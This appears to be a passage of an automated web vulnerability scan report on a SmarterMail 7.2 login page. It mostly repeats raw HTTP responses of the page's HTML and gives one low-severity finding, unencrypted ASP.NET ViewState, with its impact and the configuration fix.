<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="1" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" checked="checked" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:34:22 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=en; expires=Sat, 03-Oct-2020 00:34:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3334
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="1" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" checked="checked" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
ViewState is not Encrypted
ViewState is not Encrypted
1
TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.
Impact
An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.
Remedy
ASP.NET provides encryption for ViewState parameters.
For page based protection, place the following directive at the top of affected page.
For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web> <pages viewStateEncryptionMode="Always"> </System.Web>
Remedy References
|
- /
/ |
ViewState Version
.NET Framework 2.x
Request
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http%3a%2f%2fwww%2esmartertools%2ecom%2fHelp%2fSmarterMail%2fv7%2fDefault%2easpx%3fp%3d%5fUSR%26v%3d7%2e2%2e3925%26lang%3den%2dUS%26page%3dLoginUser" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fwww\x2esmartertools\x2ecom\x2fHelp\x2fSmarterMail\x2fv7\x2fDefault\x2easpx\x3fp\x3d\x5fUSR\x26v\x3d7\x2e2\x2e3925\x26lang\x3den\x2dUS\x26page\x3dLoginUser','helpwindow',''); return false;" tabindex='5'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='4' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:0px;width:0px;border-width:0px;" />
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="LoginLinks">
<a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>SmarterMail Free 7.2</a> | <a href='http://www.smartertools.com/smartermail/mail-server-software.aspx' target='_blank'>Windows Mail Server</a> | © 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
</div>
</div>
<script type="text/javascript">
$(document).ready(function() {
$('select').each(function() {
if ($(this).width() > 180) $(this).width(180);
});
}); </script>
</div>
<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
SmarterMail Login - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
if (parent.parent.isRoot != null)
parent.parent.location.href = location.href;
</script>
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Login/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Login" dir="ltr">
<form method="post" action="Login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI4NzA5NDYyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWAmYPZBYGAgMPZBYCAgEPFgIeBFRleHRlZAIFD2QWAgILDxAPFgIfAgULUmVtZW1iZXIgbWVkZGRkAgcPZBYGAgEPEGQQFQIUVXNlIEJyb3dzZXIgTGFuZ3VhZ2UHRW5nbGlzaBUCAAJlbhQrAwJnZxYBZmQCAw8PFgIeC05hdmlnYXRlVVJMBWhodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vSGVscC9TbWFydGVyTWFpbC92Ny9EZWZhdWx0LmFzcHg/cD1fVVNSJnY9Ny4yLjM5MjUmbGFuZz1lbi1VUyZwYWdlPUxvZ2luVXNlcmRkAgcPDxYIHghJbWFnZVVybAUGL3MuZ2lmHgVXaWR0aBsAAAAAAAAAAAEAAAAeBkhlaWdodBsAAAAAAAAAAAEAAAAeBF8hU0ICgANkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2sEHZ/xDsa2Ruq8vSjNI7VPml35tg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1'], [], [], 90);
//]]>
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<div id="ctl00_UpdatePanel1">
<div class="CenteredLogin">
<div class="ShadowBox">
<div class="LoginBox">
<div class="LoginTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="LoginTitleText">
Login to SmarterMail
</div>
</div>
</div>
</div>
<div class="LoginFrame">
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
</div>
<div class="LoginSpacer">
</div>
<div class="LoginContent">
<div class="LoginSetting">
<div class="LoginLabel">
Email Address
(ex. user@example.com)
</div>
<input name="ctl00$MPH$txtUserName" type="text" id="ctl00_MPH_txtUserName" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label></span><br />
</div>
</div>
<div class="LoginButtons">
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout('__doPostBack(\'ctl00$BPH$LanguageList\',\'\')', 0)" id="ctl00_BPH_LanguageList" tabindex="6">
<option selected="selected" value="">Use Browser Language</option>
<option value="en">English</option>
</select>
